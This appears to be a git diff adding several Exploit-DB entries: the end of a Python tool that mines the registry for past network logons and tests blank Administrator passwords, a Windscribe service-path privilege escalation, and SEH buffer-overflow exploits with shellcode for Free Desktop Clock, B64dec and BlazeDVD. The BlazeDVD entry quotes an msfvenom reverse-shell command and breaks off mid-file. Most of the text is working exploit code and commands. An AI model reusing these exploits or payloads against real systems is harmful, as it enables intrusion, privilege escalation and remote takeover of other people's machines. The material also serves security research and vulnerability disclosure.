+#REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##" (we want network logons)
+#MountPoints2 key entries are stored like '##10.2.1.40#c$'
+#-----------------------------------------------------------
+
+BANNER="""
+ _ ______________ ___ ____ __ _______ ______
+ / | / / ____/_ __/ / | / __ )/ / / / ___// ____/
+ / |/ / __/ / / / /| | / __ / / / /\__ \/ __/
+ / /| / /___ / / / ___ |/ /_/ / /_/ /___/ / /___
+/_/ |_/_____/ /_/ /_/ |_/_____/\____//____/_____/
+
+ By Hyp3rlinx
+ ApparitionSec
+"""
+
+DRIVE="X"
+FINDME="The command completed successfully."
+REG_MOUNT2='REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##"'
+REG_RDPUSERS="REG Query \"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers\""+" /s"
+VULN_FOUND=set()
+DELAY=2 #Any lower and we may get inaccurate results.
+rdp_server_lst=[]
+
+#Return prior network logons to remote systems.
+def mountpoints2():
+ mntpoint2_connections=[]
+ try:
+ p = Popen(REG_MOUNT2, stdout=PIPE, stderr=PIPE, shell=True)
+ tmp = p.stdout.readlines()
+ except Exception as e:
+ print("[!] "+str(e))
+ return False
+ for x in tmp:
+ idx = x.find("##")
+ clean = x[idx:]
+ idx2 = clean.rfind("#")
+ ip = clean[2:idx2]
+ ip = re.sub(r"#.*[A-Z,a-z]","",ip)
+ if ip not in mntpoint2_connections:
+ mntpoint2_connections.append(ip)
+ mntpoint2_connections = list(filter(None, mntpoint2_connections))
+ p.kill()
+ return mntpoint2_connections
+
+
+#Terminal server client stores remote server connections.
+def rdp_svrs():
+ global rdp_server_lst
+ try:
+ p = Popen(REG_RDPUSERS, stdout=PIPE, stderr=PIPE, shell=True)
+ tmp = p.stdout.readlines()
+ for key in tmp:
+ if key.find("Servers")!=-1:
+ pos = key.rfind("\\")
+ srv = key[pos + 1:].replace("\r\n","").strip()
+ rdp_server_lst.append(srv)
+ p.kill()
+ except Exception as e:
+ print("[!] "+str(e))
+ return False
+ return True
+
+
+#Disconnect
+def del_vuln_connection(ip):
+ try:
+ print("[!] Disconnecting vuln network logon connection.\n")
+ call(r"net use "+DRIVE+":"+" /del")
+ except Exception as e:
+ print("[!] "+str(e))
+
+
+#Check connection
+def chk_connection(ip):
+ print("[+] Testing: "+ip)
+ sys.stdout.flush()
+ cmd = Popen(['ping.exe', ip, "-n", "1"], stderr=PIPE, stdout=PIPE, shell=True)
+ stderr, stdout = cmd.communicate()
+ if "Reply from" in stderr and "Destination host unreachable" not in stderr:
+ print("[*] Target up!")
+ return True
+ else:
+ print("[!] Target unreachable :(")
+ return False
+
+
+#Test vuln
+def Test_Password_Reuse(ip):
+ print("[+] Testing "+ip + " the builtin Administrator account.\n")
+ sys.stdout.flush()
+ try:
+ p = Popen("net use X: \\\\"+ip+"\\c$ /user:Administrator", stdout=PIPE, stderr=PIPE, shell=True)
+ err = p.stderr.readlines()
+
+ if err:
+ e = str(err)
+ if e.find("error 53")!=-1:
+ print("[*] Network path not found\n")
+ return
+ elif e.find("error 1219")!=-1:
+ print("[*] Target connections to a server or shared resource by the same user, using more than one user name are disallowed.\n")
+ return
+ elif e.find("error 85")!=-1:
+ print("[*] The local device name is already in use.\n")
+ return
+ else:
+ print(e+"\n")
+
+ tmp = p.stdout.read()
+
+ if FINDME in tmp:
+ print("[*] Password reuse for the built-in Administrator found!")
+ print("[+] Connected to target: "+ ip)
+ VULN_FOUND.add(ip+":Administrator")
+ del_vuln_connection(ip)
+ p.kill()
+ except Exception as e:
+ print("[!] "+str(e))
+
+
+
+#Authenticate
+def auth(ip):
+ action_process = Process(target=Test_Password_Reuse, args=(ip,))
+ action_process.start()
+ action_process.join(timeout=5)
+ action_process.terminate()
+
+
+if __name__ == "__main__":
+
+ print(BANNER)
+ print("[+] Windows 'net use' Network Logon Type-3")
+ print("[+] Insufficient Password Prompt")
+ print("[+] By hyp3rlinx\n")
+
+ time.sleep(3)
+
+ print("[+] Deleting any existing network logons to start clean.")
+
+ #Make sure no exist sessions already exist.
+ call(r"net use * /del /y")
+ sys.stdout.flush()
+ time.sleep(1)
+
+
+ #Grab previous connections from MountPoints2 if any.
+ rdp_svrs()
+ svrlst=mountpoints2()
+
+ if svrlst:
+ svrlst + rdp_server_lst
+ else:
+ svrlst = rdp_server_lst
+
+ if not svrlst:
+ print("[*] No MountPoints2 artifacts found, enter an IP.")
+ sys.stdout.flush()
+ ip=raw_input("[+] Target IP> ")
+ if chk_connection(ip):
+ auth(ip)
+ else:
+ #We have MountPoints2 or RDP Server list IP we can try.
+ for ip in svrlst:
+ if chk_connection(ip):
+ auth(ip)
+
+ time.sleep(DELAY)
+
+
+ if len(VULN_FOUND) != 0:
+ print("[*] Located the following vulnerable systems:")
+ sys.stdout.flush()
+ for v in VULN_FOUND:
+ print("[+] "+v)
+ else:
+ print("[+] All previous attempts failed, enter an IP and give it a shot!.")
+ sys.stdout.flush()
+ ip=raw_input("[+] Target IP> ")
+ if chk_connection(ip):
+ auth(ip)
+
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=Je93Neb0k8g
+
+
+[Network Access]
+Remote
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: February 28, 2020
+MSRC "behavior you are reporting is by design" : March 30, 2020
+April 5, 2020 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/local/48306.txt b/exploits/windows/local/48306.txt
new file mode 100644
index 000000000..5f1850679
--- /dev/null
+++ b/exploits/windows/local/48306.txt
@@ -0,0 +1,52 @@
+# Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
+# Date: 2020-04-10
+# Exploit Author: MgThuraMoeMyint
+# Vendor Homepage: https://windscribe.com
+# Version: v1.83 Build 20
+# Tested on: Windows 10, version 1909
+
+In windscribe v1.83 , there is a service via windscribe that every
+authenticated user can modify.
+
+C:\Users\mgthura>sc qc WindscribeService
+[SC] QueryServiceConfig SUCCESS
+SERVICE_NAME: WindscribeService
+TYPE : 10 WIN32_OWN_PROCESS
+START_TYPE : 2 AUTO_START
+ERROR_CONTROL : 1 NORMAL
+BINARY_PATH_NAME : C:\Program Files (x86)\Windscribe\WindscribeService.exe
+LOAD_ORDER_GROUP :
+TAG : 0
+DISPLAY_NAME : WindscribeService
+DEPENDENCIES :
+SERVICE_START_NAME : LocalSystem
+
+That shows that running as Local System this means that the
+BINARY_PATH_NAME parameter can be modified to execute any command on
+the system.
+I'll change binary_path_name with a command that add a user to
+administrators group , so it will be
+
+C:\Users\mgthura>sc config WindscribeService binPath= "net localgroup
+administrators pentest /add"
+[SC] ChangeServiceConfig SUCCESS
+
+C:\Users\mgthura>sc stop WindscribeService
+
+SERVICE_NAME: WindscribeService
+TYPE : 10 WIN32_OWN_PROCESS
+STATE : 3 STOP_PENDING
+(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
+WIN32_EXIT_CODE : 0 (0x0)
+SERVICE_EXIT_CODE : 0 (0x0)
+CHECKPOINT : 0x4
+WAIT_HINT : 0x0
+
+C:\Users\mgthura>sc start WindscribeService
+[SC] StartService FAILED 1053:
+The service did not respond to the start or control request in a timely fashion.
+
+Restarting service will cause the service to fail as the binary path
+would not point into the actual executable of the service.
+However the command will be executed successfully and the user will be
+added to the local administrators group.
\ No newline at end of file
diff --git a/exploits/windows/local/48314.py b/exploits/windows/local/48314.py
new file mode 100755
index 000000000..9a6660afb
--- /dev/null
+++ b/exploits/windows/local/48314.py
@@ -0,0 +1,324 @@
+# Exploit Title: Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)
+# Exploit Author: Bobby Cooke
+# Date: 2020-04-11
+# Vendor: Drive Software Company
+# Vendor Site: http://www.drive-software.com
+# Software Download: http://www.drive-software.com/download/freeclock.exe
+# Tested On: Windows 10 - Pro 1909 (x86) & Home 1909 (x86)
+# - Does not work on x64 version
+# Version: Free Desktop Clock 3.0
+# Recreate: Install & Open > Time Zones > 'Enter display name' textbox > paste buffer
+
+############################### CRASH INFO ###############################
+# [!] Access violation
+# 042D15E7 8908 mov [eax], ecx ; FreeDesk.00440044
+# SEH chain of main thread
+# Address SE handler
+# 0014EE24 FreeDesk.00410041 <- Structured Exception Handler Overwrite
+# 00410041 74737953
+# 69620C00 *** CORRUPT ENTRY ***
+############################### CRASH INFO ###############################
+
+File = 'poc.txt'
+
+######################### EXPLOIT ENVIRONMENT INFO #########################
+#badChars = '\x00\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e'
+#badChars += '\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f'
+#goodChars = '\x81\x8D\x8F\x90\x9D' (within 0x80-0x9f)
+
+# Base | Rebase | SafeSEH | ASLR | NXCompat | Modulename
+# 0x00400000 | False | False | False | False | [FreeDesktopClock.exe]
+# 0x042b0000 | True | False | False | False | [Clock.dll]
+######################### EXPLOIT ENVIRONMENT INFO #########################
+
+os_nSEH = '\x41'*(457) # Offset to nSEH Overwrite
+nSEH = '\xeb\x05' # jmp short +2
+SEH = '\xeb\x43' # 0x004300eb: pop esi# pop ebx# ret [FreeDesktopClock.exe]
+# nSEH & SEH translated opcodes after Pop-Pop-Ret
+# EB 00 jmp short +2
+# 05 00EB0043 add eax, 4300EB00
+
+# GetPC to decode our decoder using Venetian Blinds technique
+getPC = '\x73' # add [ebx], dh # nop | [EBX] = writable memory
+getPC += '\x61' # popad # [ESP] = &Payload
+getPC += '\x72' # add [edx], dh # realigns execution for 1 byte opcodes
+
+ebx2eax = '\x58' # pop eax # EAX = &Payload
+ebx2eax += '\x72' # add [edx], dh
+
+# Use Venetian Blinds technique to fix our mangled decoder
+# + Using the Venetian Blinds Technique costs 14 bytes to fill 1 0x00 with 1 legit shellcode byte.
+#
+# Ajust EAX to &Decoder
+getDecoder = '\x05\x13\x11' # add eax, 0x11001300 # EAX + 512-bytes
+getDecoder += '\x72' # add [edx], dh
+getDecoder += '\x2D\x11\x11' # sub eax, 0x11001100 # EAX = &Decoder
+getDecoder += '\x72' # add [edx], dh
+getDecoder += '\x50' # push eax # [ESP] = &Decoder
+getDecoder += '\x72' # add [edx], dh
+
+############################# ZIPPER DECODER ###############################
+# Set EAX = First non-null byte of shellcode
+# init:
+# 1 | 50 | push eax # EAX = &Shellcode
+# 2 | 5F | pop edi # EDI = Decoder Destination Base Address
+# 3 | 47 | inc edi # First 0x00 byte of shellcode
+# 4:5 | 33D2 | xor edx, edx
+# 6:7 | 33C9 | xor ecx, ecx
+# 8:11 | 66:B9 1004 | mov cx, 410 # ECX = Loop Counter
+# decodeLoop:
+# 12:13 | 33DB | xor ebx, ebx
+# 14 | 42 | inc edx # EDX+EAX = &SourceShellcodeByte
+# 15 | 42 | inc edx # increment to next non-null byte
+# 16:17 | 32DB | xor bl, bl # clear BL to hold next shellcode byte
+# 18:20 | 021C10 | add bl, [eax+edx] # BL = SourceShellcodeByte
+# 21:22 | 203F | and [edi], bh # [EDI] = SC-byte, clear with: AND 0x00
+# 23:24 | 301F | xor [edi], bl # Write next byte of shellcode
+# 25 | 47 | inc edi
+# 26 | 49 | dec ecx
+# 27:28 | 74 02 | je short jmp2code
+# 29:30 | ^ EB ED | jmp short decodeLoop
+# jmp2code:
+# 31 | 50 | push eax
+# 32 | C3 | ret
+################################################3###########################
+
+#DecoderHex = '505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3'
+firstHalf = '\x50\x47\xD2\xC9\xB9\x04\xDB\x42\xDB\x1C\x20\x30\x47\x74\xEB\x50'
+#venBldHalf = '5F 33 33 66 10 33 42 32 02 10 3F 1F 49 02 ED C3'
+# 2 4 6 8 10 12 14 16 18 20 22 24 26 28 30 32
+
+# Note: These nop unicode instructions are actually [reg+0x00] not [reg]
+# The [reg] version (0032) is 2 bytes. The [reg+0x00] version (007200) is 3 bytes
+# Use the 3 byte version for Venetian Blinds alignment
+ # Example:
+ # nasm > add [edx], dh
+ # 00000000 0032 add [edx],dh
+ # nasm > add [edx+00], dh
+ # 00000000 0032 add [edx],dh
+ # nasm > add [edx+01], dh
+ # 00000000 007201 add [edx+0x1],dh
+ # + This happens when typing in ASM commands into msf-nasm_shell and immunity
+
+## 2nd byte - \x00 => \x5F
+venBlinds = '\x40' # inc eax // now eax points shellcode byte
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\xC6\x5F' # mov byte [eax], 0x50
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points shellcode byte
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+## 4th byte - \x00 => \x33
+venBlinds += '\xC6\x33' # mov byte [eax], 0x33
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points shellcode byte
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+## 6th byte - \x00 => \x33
+venBlinds += '\xC6\x33' # mov byte [eax], 0x33
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points shellcode byte
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+## 8th byte - \x00 => \x66
+venBlinds += '\xC6\x66' # mov byte [eax], 0x66
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points shellcode byte
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+## 10th byte - \x00 => \x10
+venBlinds += '\xC6\x10' # mov byte [eax], 0x10
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points shellcode byte
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+## 12th byte - \x00 => \x33
+venBlinds += '\xC6\x33' # mov byte [eax], 0x33
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points shellcode byte
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+## 14th byte - \x00 => \x42
+venBlinds += '\xC6\x42' # mov byte [eax], 0x42
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points shellcode byte
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+## 16th byte - \x00 => \x32
+venBlinds += '\xC6\x32' # mov byte [eax], 0x32
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points shellcode byte
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+## 18th byte - \x00 => \x02
+venBlinds += '\xC6\x02' # mov byte [eax], 0x02
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points shellcode byte
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+## 20th byte - \x00 => \x10
+venBlinds += '\xC6\x10' # mov byte [eax], 0x10
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points shellcode byte
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+## 22nd byte - \x00 => \x3F
+venBlinds += '\xC6\x3F' # mov byte [eax], 0x3F
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points shellcode byte
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+## 24nd byte - \x00 => \x1F
+venBlinds += '\xC6\x1F' # mov byte [eax], 0x1F
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points shellcode byte
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+## 26th byte - \x00 => \x49
+venBlinds += '\xC6\x49' # mov byte [eax], 0x49
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points shellcode byte
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+## 28th byte - \x00 => \x02
+venBlinds += '\xC6\x02' # mov byte [eax], 0x02
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points shellcode byte
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+## 30th byte - \x00 => \xED
+venBlinds += '\xC6\xED' # mov byte [eax], 0xED
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points shellcode byte
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+venBlinds += '\x40' # inc eax // now eax points to the next '\x00'
+venBlinds += '\x72' # add [edx], dh // nop to realign opcode execution
+## 32nd byte - \x00 => \xC3
+venBlinds += '\xC6\xC3' # mov byte [eax], 0xC3
+venBlinds += '\x72' # add [edx], dh
+venBlinds += '\x40' # inc eax // now eax points shellcode byte
+venBlinds += '\x72' # add [edx], dh
+# Jump to the decoded decoder by Returning to the address we saved on the stack
+venBlinds += '\xC3' # ret [!] Now we are executing the decoder!
+
+os_decoder = '\x90'*((512/2)-len(nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds))
+
+#badChars = 00 0d 80 82->8e 91->9f
+# Custom PopCalc shellcode that avoids the bad characters
+fKernel32 = '\x33\xF6' # xor esi, esi
+fKernel32 += '\xF7\xE6' # mul esi
+fKernel32 += '\x64\x03\x52\x30' # add edx, fs:[edx+30] # EBX = Address_of_PEB
+fKernel32 += '\x03\x42\x0C' # add eax, [edx+C] # EBX = Address_of_LDR
+fKernel32 += '\x03\x70\x1C' # add esi, [eax+1C] # ESI = 1st entry in InitOrderModuleList / ntdll.dll
+fKernel32 += '\xAD' # lodsd # EAX = 2nd entry in InitOrderModuleList / kernelbase.dll
+fKernel32 += '\x50' # push eax
+fKernel32 += '\x5E' # pop esi
+fKernel32 += '\xAD' # lodsd # EAX = 3rd entry in InitOrderModuleList / kernel32.dll
+fKernel32 += '\xFF\x70\x08' # push dword ptr [eax+8] # [ESP] = &kernel32
+
+gExpotTbl = '\x33\xC9' # xor ecx, ecx
+gExpotTbl += '\x33\xF6' # xor esi, esi
+gExpotTbl += '\x33\xDB' # xor ebx, ebx
+gExpotTbl += '\xF7\xE3' # mul ebx
+gExpotTbl += '\x58' # pop eax # EAX = &kernel32
+gExpotTbl += '\x50' # push eax # [ESP] = &kernel32
+gExpotTbl += '\x03\x70\x3C' # add esi, [eax+0x3C] ; ESI = RVA NewEXEHeader
+gExpotTbl += '\x03\xF0' # add esi, eax ; ESI = &NewEXEHeader
+gExpotTbl += '\x03\x56\x78' # add edx, [esi+0x78] ; EDX = RVA ExportTable
+gExpotTbl += '\x03\xD0' # add edx, eax ; EDX = &ExportTable = 763477B0
+
+gExpotTbl += '\x03\x5A\x20' # add ebx, [edx+0x20] ; EBX = RVA ExportNameTable
+gExpotTbl += '\x03\xD8' # add ebx, eax ; EBX = &ExportNameTable
+
+gExpotTbl += '\x03\x4A\x24' # add ecx, [edx+0x24] ; ECX = RVA ExportOrdinalTable
+gExpotTbl += '\x03\xC8' # add ecx, eax ; ECX = &ExportOrdinalTable
+gExpotTbl += '\x51' # push ecx
+
+gExpotTbl += '\x33\xFF' # xor edi, edi
+gExpotTbl += '\x03\x7A\x1C' # add edi, [edx+0x1C] ; EDI = RVA ExportAddrTable
+gExpotTbl += '\x03\xF8' # add edi, eax ; EDI = &ExportAddrTable
+gExpotTbl += '\x57' # push edi
+
+fWinExec = '\x68\x57\x69\x6E\x45' # push 0x456E6957 ; EniW
+fWinExec += '\x33\xC0' # xor eax, eax ; EAX = Counter
+
+fWinExec += '\x33\xF6' # xor esi, esi
+fWinExec += '\x03\xF4' # add esi, esp ; ESI = "WinE"
+fWinExec += '\xFC' # cld ; Process strings left to right
+fWinExec += '\x50' # push eax
+fWinExec += '\x33\xC9' # xor ecx, ecx
+fWinExec += '\x41' # inc ecx
+fWinExec += '\x41' # inc ecx
+fWinExec += '\x41' # inc ecx
+fWinExec += '\x41' # inc ecx
+fWinExec += '\xF7\xE1' # mul ecx
+fWinExec += '\x33\xFF' # xor edi, edi
+fWinExec += '\x03\x3C\x18' # add edi, [eax+ebx]
+fWinExec += '\x58' # pop eax
+fWinExec += '\x03\x7C\x24\x0C' # add edi, [esp+0xC] ; EDI = &NthNameString
+fWinExec += '\xF3\xA6' # repe cmpsb ; compare [&NthNameString] to "WinExec"
+fWinExec += '\x74\x03' # jz found ; If [&NthNameString] == "WinExec" end loop
+fWinExec += '\x40' # inc eax ; Counter ++
+fWinExec += '\xEB\xE1' # jmp short searchLoop ; restart loop
+
+fWinExec += '\x33\xC9' # xor ecx, ecx
+fWinExec += '\x41' # inc ecx
+fWinExec += '\x41' # inc ecx
+fWinExec += '\xF7\xE1' # mul ecx
+fWinExec += '\x33\xC9' # xor ecx, ecx
+fWinExec += '\x03\x4C\x24\x08' # add ecx, [esp+0x8] ; ECX = &ExportOrdinalTable
+fWinExec += '\x03\xC8' # add ecx, eax
+fWinExec += '\x33\xC0' # xor eax, eax
+fWinExec += '\x66\x03\x01' # add ax, [ecx] ; AX = ordinalNumber
+
+fWinExec += '\x33\xC9' # xor ecx, ecx
+fWinExec += '\x41\x41\x41\x41' # inc ecx X 4
+fWinExec += '\xF7\xE1' # mul ecx
+fWinExec += '\xFF\x74\x24\x04' # push dword [esp+0x4]
+fWinExec += '\x01\x04\x24' # add [esp], eax
+fWinExec += '\x5A' # pop edx
+fWinExec += '\x33\xDB' # xor ebx, ebx
+fWinExec += '\x03\x1A' # add ebx, [edx] ; EBX = RVA WinExec
+fWinExec += '\x03\x5C\x24\x0C' # add ebx, [esp+0xC] ; EBX = &WinExec
+# Call WinExec( CmdLine, ShowState );
+# CmdLine = "calc.exe"
+# ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window
+callWinExec = '\x33\xC9' # xor ecx, ecx ; clear eax register
+callWinExec += '\x51' # push ecx ; string terminator 0x00 for "calc.exe" string
+callWinExec += '\x68\x2E\x65\x78\x65' # push 0x6578652e ; exe. : 6578652e
+callWinExec += '\x68\x63\x61\x6C\x63' # push 0x636c6163 ; clac : 636c6163
+callWinExec += '\x33\xC0' # xor eax, eax
+callWinExec += '\x03\xC4' # add eax, esp ; save pointer to "calc.exe" string in eax
+callWinExec += '\x41' # inc ecx ; uCmdShow SW_SHOWNORMAL = 0x00000001
+callWinExec += '\x51' # push ecx ; uCmdShow - push 0x1 to stack # 2nd argument
+callWinExec += '\x50' # push eax ; lpcmdLine - push string address stack # 1st argument
+callWinExec += '\xFF\xD3' # call ebx ; Call the WinExec Function
+
+shellcode = fKernel32+gExpotTbl+fWinExec+callWinExec
+
+buffer = os_nSEH+nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds+os_decoder+firstHalf+shellcode
+filler = '\x77'*(9000-len(buffer))
+buffer = buffer+filler
+
+try:
+ payload = buffer
+ f = open(File, 'w')
+ f.write(payload)
+ f.close()
+ print File + " created successfully"
+except:
+ print File + ' failed to create'
\ No newline at end of file
diff --git a/exploits/windows/local/48317.py b/exploits/windows/local/48317.py
new file mode 100755
index 000000000..694417788
--- /dev/null
+++ b/exploits/windows/local/48317.py
@@ -0,0 +1,55 @@
+# Exploit Title: B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)
+# Date: 2020-04-13
+# Exploit Author: Andy Bowden
+# Vendor Homepage: http://4mhz.de/b64dec.html
+# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip
+# Version: Base64 Decoder 1.1.2
+# Tested on: Windows 10 x86
+
+#Instructions:
+# Run the script to create the Crash.txt file. Copy the contents of the file and paste them into the search box and then click decode.
+
+f = open("crash.txt", "wb")
+
+padding1 = b"ERCDERCD"
+padding1 += b"\x90" * 100
+
+# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x0a\x0d'
+# cmd=calc.exe exitfunc=thread -f python
+payload = b""
+payload += b"\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
+payload += b"\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
+payload += b"\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
+payload += b"\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
+payload += b"\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
+payload += b"\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
+payload += b"\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
+payload += b"\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
+payload += b"\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
+payload += b"\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
+payload += b"\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
+payload += b"\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
+payload += b"\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
+payload += b"\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
+payload += b"\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
+payload += b"\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
+payload += b"\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
+
+egghunter = b"\x8B\xFD" # mov edi,ebp
+egghunter += b"\xB8\x45\x52\x43\x44" # mov eax,45525344 ERCD
+egghunter += b"\x47" # inc edi
+egghunter += b"\x39\x07" # cmp dword ptr ds:[edi],eax
+egghunter += b"\x75\xFB" # jne
+egghunter += b"\x39\x07" # cmp dword ptr ds:[edi],eax
+egghunter += b"\x75\xF7" # jne
+egghunter += b"\xFF\xE7" # jmp edi
+
+buf = padding1 + payload
+buf += b"\x90" * (580 - len(padding1 + payload))
+buf += egghunter
+buf += b"\x90" * (620 - len(buf))
+buf += b"\x90\x90\xEB\xCE"
+buf += b"\x86\x1e\x40" #00401e86
+
+f.write(buf)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48329.py b/exploits/windows/local/48329.py
new file mode 100755
index 000000000..68240e330
--- /dev/null
+++ b/exploits/windows/local/48329.py
@@ -0,0 +1,80 @@
+# Exploit Title: BlazeDVD 7.0.2 - Buffer Overflow (SEH)
+# Date: 2020-04-15
+# Exploit Author: areyou1or0 <Busra Demir>
+# Software Link: http://www.blazevideo.com/dvd-player/free-dvd-player.html
+# Version: 7.0.2
+# Tested on: Windows 7 Pro x86
+
+#!/usr/bin/python
+
+file = "exploit.plf"
+offset ="A"*(612-4)
+nseh = "\xeb\x1e\x90\x90"
+seh = "\x34\x31\x02\x64"
+nops = "\x90" * 24
+
+# msfvenom -p windows/shell_reverse_tcp LHOST=3D192.168.8.121 LPORT=8888= -f python -e x86/alpha_mixed -b '\x00\x0a\x0d\xff'
+shellcode = ""
